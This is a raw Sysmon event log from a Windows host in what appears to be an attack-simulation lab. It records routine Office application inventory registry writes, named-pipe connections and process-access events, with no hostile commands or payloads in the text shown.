13241300x800000000000000077254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\databasecompare.|d0717b3f5b185152\LinkDate08/10/2019 04:45:30 13241300x800000000000000077253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\databasecompare.|d0717b3f5b185152\Publishermicrosoft corporation 13241300x800000000000000077252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\databasecompare.|d0717b3f5b185152\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\dcf\databasecompare.exe 13241300x800000000000000077251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.showhelp.|aeead2886fb6295a\BinProductVersion16.0.13127.20164 13241300x800000000000000077250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.showhelp.|aeead2886fb6295a\LinkDate08/10/2020 01:30:47 13241300x800000000000000077249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.showhelp.|aeead2886fb6295a\Publishermicrosoft corporation 13241300x800000000000000077248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.showhelp.|aeead2886fb6295a\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\dcf\common.showhelp.exe 13241300x800000000000000077247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|8e5b8f8cae900bd\BinProductVersion16.0.11929.20102 13241300x800000000000000077246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|8e5b8f8cae900bd\LinkDate08/08/2019 15:45:13 13241300x800000000000000077245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|8e5b8f8cae900bd\Publishermicrosoft corporation 13241300x800000000000000077244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|8e5b8f8cae900bd\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\dcf\common.dbconnection64.exe 13241300x800000000000000077243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|4bf898c15eaab915\BinProductVersion16.0.11929.20102 13241300x800000000000000077242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|4bf898c15eaab915\LinkDate08/08/2019 15:45:13 13241300x800000000000000077241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|4bf898c15eaab915\Publishermicrosoft corporation 13241300x800000000000000077240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\common.dbconnect|4bf898c15eaab915\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\dcf\common.dbconnection.exe 13241300x800000000000000077239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\cnfnot32.exe|d12e39d78b8f7f17\BinProductVersion16.0.13127.21348 13241300x800000000000000077238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\cnfnot32.exe|d12e39d78b8f7f17\LinkDate03/06/2021 23:33:55 13241300x800000000000000077237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\cnfnot32.exe|d12e39d78b8f7f17\Publishermicrosoft corporation 13241300x800000000000000077236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\cnfnot32.exe|d12e39d78b8f7f17\LowerCaseLongPathc:\program files\microsoft office\root\office16\cnfnot32.exe 13241300x800000000000000077235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\clview.exe|2e549e1ffb2d5a44\BinProductVersion16.0.13127.21348 13241300x800000000000000077234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\clview.exe|2e549e1ffb2d5a44\LinkDate03/06/2021 23:35:01 13241300x800000000000000077233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\clview.exe|2e549e1ffb2d5a44\Publishermicrosoft corporation 13241300x800000000000000077232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\clview.exe|2e549e1ffb2d5a44\LowerCaseLongPathc:\program files\microsoft office\root\office16\clview.exe 13241300x800000000000000077231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvlp.exe|5c890c66f7320a9b\BinProductVersion5.2.158.0 13241300x800000000000000077230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvlp.exe|5c890c66f7320a9b\LinkDate04/09/2020 03:00:39 13241300x800000000000000077229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvlp.exe|5c890c66f7320a9b\Publishermicrosoft corporation 13241300x800000000000000077228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvlp.exe|5c890c66f7320a9b\LowerCaseLongPathc:\program files\microsoft office\root\client\appvlp.exe 13241300x800000000000000077227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|dc36ed799a92e521\BinProductVersion5.1.154.0 13241300x800000000000000077226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|dc36ed799a92e521\LinkDate10/14/2019 18:26:31 13241300x800000000000000077225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|dc36ed799a92e521\Publishermicrosoft corporation 13241300x800000000000000077224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|dc36ed799a92e521\LowerCaseLongPathc:\program files\microsoft office\root\client\appvdllsurrogate32.exe 13241300x800000000000000077223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|4a3dbcbfcf815bda\BinProductVersion5.1.125.0 13241300x800000000000000077222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|4a3dbcbfcf815bda\LinkDate05/15/2017 21:34:56 13241300x800000000000000077221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|4a3dbcbfcf815bda\Publishermicrosoft corporation 13241300x800000000000000077220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appvdllsurrogate|4a3dbcbfcf815bda\LowerCaseLongPathc:\program files\microsoft office\root\client\appvdllsurrogate64.exe 13241300x800000000000000077219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|ca17c1da2ae73545\BinProductVersion16.0.13127.20164 13241300x800000000000000077218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|ca17c1da2ae73545\LinkDate08/10/2020 00:47:27 13241300x800000000000000077217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|ca17c1da2ae73545\Publishermicrosoft corporation 13241300x800000000000000077216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|ca17c1da2ae73545\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\appsharinghookcontroller.exe 13241300x800000000000000077215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|c43916d5d05bf0ab\BinProductVersion16.0.13127.20164 13241300x800000000000000077214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|c43916d5d05bf0ab\LinkDate08/10/2020 01:34:28 13241300x800000000000000077213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|c43916d5d05bf0ab\Publishermicrosoft corporation 13241300x800000000000000077212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\appsharinghookco|c43916d5d05bf0ab\LowerCaseLongPathc:\program files\microsoft office\root\office16\appsharinghookcontroller64.exe 13241300x800000000000000077211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b4fb926f9d8f82ed\BinProductVersion16.0.13127.21336 13241300x800000000000000077210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b4fb926f9d8f82ed\LinkDate03/04/2021 07:49:19 13241300x800000000000000077209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b4fb926f9d8f82ed\Publishermicrosoft corporation 13241300x800000000000000077208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b4fb926f9d8f82ed\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\accicons.exe 13241300x800000000000000077207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b0fb91e640fd7b1d\BinProductVersion16.0.11727.20086 13241300x800000000000000077206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b0fb91e640fd7b1d\LinkDate06/06/2019 21:22:15 13241300x800000000000000077205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b0fb91e640fd7b1d\Publishermicrosoft corporation 13241300x800000000000000077204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\accicons.exe|b0fb91e640fd7b1d\LowerCaseLongPathc:\program files\microsoft office\root\office16\accicons.exe 13241300x800000000000000077203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplication\0000ec48191115a7e07edd9e733fd5dec0900000ffff\PublisherMicrosoft Corporation 18141800x800000000000000077202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.670{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-000E-00000000BB01}2436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.654{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-000E-00000000BB01}2436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.639{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-000E-00000000BB01}2436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.607{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.607{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.592{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.592{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000077194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.592{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124C:\Windows\System32\sppsvc.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 